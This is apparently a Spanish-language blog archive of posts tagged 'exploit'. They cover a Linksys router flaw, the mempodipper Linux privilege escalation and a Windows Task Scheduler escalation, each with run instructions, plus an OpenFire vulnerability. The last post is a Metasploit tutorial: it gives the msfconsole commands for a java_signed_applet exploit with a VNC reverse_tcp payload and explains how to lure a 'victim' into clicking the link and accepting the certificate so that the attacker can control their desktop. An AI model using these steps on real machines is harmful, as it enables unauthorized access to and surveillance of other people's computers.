Archives for 

exploit

Descubren 0-Day en routers Linksys

linksys

Un grupo de investigadores llamado DefenseCode han descubierto una grave vulnerabilidad en el firmware de los router Linksys, la cual permite a un atacante obtener acceso root remotamente.

Este grupo investigador  se comunico con  Cisco  y le compartieron  una descripción detallada de la vulnerabilidad junto con el exploit PoC para explotarla. Cisco dijo que la vulnerabilidad ha sido resuelta ya en la última versión de firmware, (4.30.14) aunque  todas las versiones anteriores siguen siendo vulnerables.

Dicha vulnerabilidad es demasiado grave ya que alrededor del mundo hay mas de 70.000 routers Linkys en muchos hogares del mundo, y si no se actualizan estarian en riesgo de tener futuros dolores de cabeza.

La vulnerabilidad fue descubierta durante una evaluación de seguridad del router linksys para un cliente. Cisco  lo llevó a los investigadores que tardaron solo 12 días para desarrollar un exploit totalmente funcional. Eso incluye  el hack de hardware para la depuración router, análisis de vulnerabilidad, análisis de la memoria y el desarrollo de exploit.

A continuacion comparto un video donde se encuentra la PoC (Prueba de concepto) de este fallo de seguridad:

httpv://www.youtube.com/watch?v=cv-MbL7KFKE

PoC: Elevación de privilegios en el kernel Linux

Hace poco me entero de una nueva vulnerabilidad en el kernel de Linux, esta vez se trata de una vulnerabilidad, la cual permite escalar privilegios localmente en un sistema que tenga el kernel de Linux 2.6

El fallo fue descubierto por Jüri Aedla y  se debe a una incorrecta comprobación de privilegios al abrir el ‘/proc/#pid#/mem‘ de un proceso.

La informacion completa del fallo puede encontrarse en este link, alli explican paso a paso en que consiste la vulnerabilidad y como explotarla.

Esta es una vulnerabilidad grave, ya que  cualquier persona autorizada podria acceder como ROOT a cualquier sistema (obviamente que sea vulnerable) tan solo con estar fisicamente en el equipo y ejecutar el exploit.

En RinconInformatico.NET, se hizo la prueba de concepto con el fin de verificar  que tan facil seria para un atacante obtener una consola de root, y la verdad es que es bastante sencillo.

Se deben seguir los siguientes pasos:

  1. Se obtiene el codigo del exploit, elaborado en C, denominado por el autor como mempodipper
  2. Teniendo el codigo fuente del script, se procede a compilarlo:

    $ gcc mempodipper.c -o mempodipper

  3. Despues de compilar, solo resta ejecutar el binario y esperar  el resultado:
./mempodipper
Si todo ha salido bien, obtendremos root en unos pocos segundos:

 

Afortunadamente, las bondades del software libre permite que el bug sea corregido en tiempo record, aqui puedes ver el parche desarrollado por Linus Torvalds el cual soluciona la vulnerabilidad.

Solo queda esperar a que las diferentes distribuciones empaqueten la nueva version incluyendo el parche y actualizar de inmediato. Por su parte el proyecto Debian ya parcho casi todas las versiones, solo falta la version de wheezy, para la cual se debe esperar 10 dias a que la version en SID (ya parchada)  pase a testing.

Nuevas vulnerabilidades en OpenFire <=3.6.4

openfire 3.6.4

OpenFire, es una solucion libre  muy utilizada en el ambiente laboral  para aspectos de Colaboración (Chat, envio de archivos, salones de conferencias) que usa el protocolo Jabber (si el mismo de Google Talk) para proveer a sus usuarios de servicios de mensajeria instantanea, es extensible a hacer video conferencia y se puede integrar con Asterisk para hacer llamadas. Anteriormente aqui en RinconInformatico.NET hemos escrito algunas entradas sobre esta magnifica herramienta.

Sin embargo, reciemente se han descubierto algunos fallos GRAVES de seguridad en la ultima version (3.6.4), los cuales permiten a  un atacante  ejecutar funciones como un usuario autenticado y hacer peticiones al servidor. El ataque funciona mediante la inclusión de algunos enlaces  de secuencia de comandos en una página que tiene acceso a un sitio al que el usuario se conoce (O se supone) que han sido autenticados. Una explotación exitosa de estas vulnerabilidades podría resultar en,  comprometer toda la aplicacion, el robo de credenciales de autenticación basado en cookies, redirección de la página arbitraria, la divulgación o modificación de datos sensibles y ataques de phishing.

En exploit-db se ha publicado toda la informacion del fallo de seguridad, y una prueba de concepto.  Alli nos muestran claramente como de una forma muy sencilla se puede explotar la vulnerabilidad y comprometer la seguridad del sistema.

Recomendamos a todos aquellos que usen openfire estar pendiente de la pagina oficial,  esperando la solucion a este grave fallo.

PoC: Escalada de privilegios en Windows vista/7/2008

Hace poco se publico una   vulnerabilidad 0-day que afectaba la mayoria de las plataformas Windows (7/vista/2008) , dicho fallo podria ser explotada por atacantes locales para lograr el control completo de un sistema vulnerable. Este “problema” es causado por un error de validación en el servicio de administración de tareas el cual falla al prevenir que los usuarios manipulen ciertos campos en el esquema del archivo XML por medio de la interface COM, lo cual podría permitir a un usuario malicioso manipular los archivos XML validos y “saltarse” el chequeo de integridad CRC32 y ejecutar código de manera arbitraria con privilegios Administrativos

En exploitdb ya se encuentra el exploit disponible y lo pueden obtener desde este enlace. Para el correr el exploit debemos tener en cuenta algunos aspectos importantes como:

  • La extensión del exploit debe ser  .wfs (ya que es un archivo de comandos de Windows )
  • El exploit  tiene como fin, crear un usuario  administrador en el sistema vulnerable, por tal razón,   es importante tener claro el idioma del sistema objetivo, ya que si es un Windows en español, se debe modificar el exploit, reemplazar “Administrators” por su simil en español “Administradores”.
  • Puedes modificar el exploit,  para  escoger el nombre del usuario y la contraseña que se desea  agregar.
  • Algunos Antivirus ya detectan el código malicioso.

En Rinconinformatico.NET, realizamos la prueba en una maquina Windows 7 en español, y funciono sin problemas:

El procedimiento que se realizo, para llevar con éxito la explotación  fue el siguiente:

  1. Descargamos  el código del exploit
  2. Modificamos el código, para crear el usuario admin,  y lo agregamos al grupo “Administradores”
  3. Abrimos una consola, navegamos hasta donde este el script, y lo ejecutamos
  4. cscript exploit.wsf

  5. Eso es todo, verificamos y tenemos nuestro usuario admin, en el grupo administradores.

Como pueden ver, de una forma muy sencilla, y aprovechando un fallo grave en Windows, podemos crear un usuario administrador, y obtener el control total del sistema.

Nota: Esta entrada simplemente fue una prueba de concepto.  Solamente es fines educativos e informativos.

Como inyectar un servidor VNC en una maquina remota usando el metasploit

En esta ocasion, se mostrara como de manera facil  y usando el Metasploit Framework  inyectaremos un servidor VNC en una maquina remota para poder visualizar el escritorio de la victima y hacer lo que deseemos.

Antes de entrar en materia debemos tener en cuenta que  el exito del exploit depende de varios factores  entre ellos tenemos:

  • Antivirus de la maquina victima -> He hecho algunas pruebas y  el NOD32 detecta  el archivo como un troyano.
  • JAVA -> Es necesario que la victima tenga instalado JAVA instalado
  • Que la victima acepte el certificado.
  • Un poco de suerte.

Para empezar debemos actualizar nuestro Metasploit:

    msfupdate

El siguiente paso es correr la consola del metasploit:

    msfconsole

Ahora seleccionamos el exploit  y asignamos los parametros necesarios:

    use exploit/multi/browser/java_signed_applet
    set payload windows/vncinject/reverse_tcp
    set lhost 192.168.100.1 -> Ip local
    lhost => 192.168.1.100
    exploit

A continuacion debe salir algo como esto:

El siguiente paso es hacer que nuestra victima haga click en el enlace malioso que el exploit a creado:

Hay que tener en cuenta que esta es una direccion privada y que asi solo funcionara si nuestra victima esta en la misma red LAN. Si se desea hacer a traves de Internet se debe cambiar el enlace por la IP publica y asegurarse que  no haya algun dispositivo como router, firewall o demas que impidan el paso hacia el puerto 8080
Cuando la Victima haga click en el  enlace aparecera una advertencia como esta:

Si nuestra victima ejecuta la aplicacion, inmediatamente se nos abrira la pantalla del escritorio remoto donde podremos  ver lo que hace la victima en ese momento,   y hacer lo que nosotros queramos.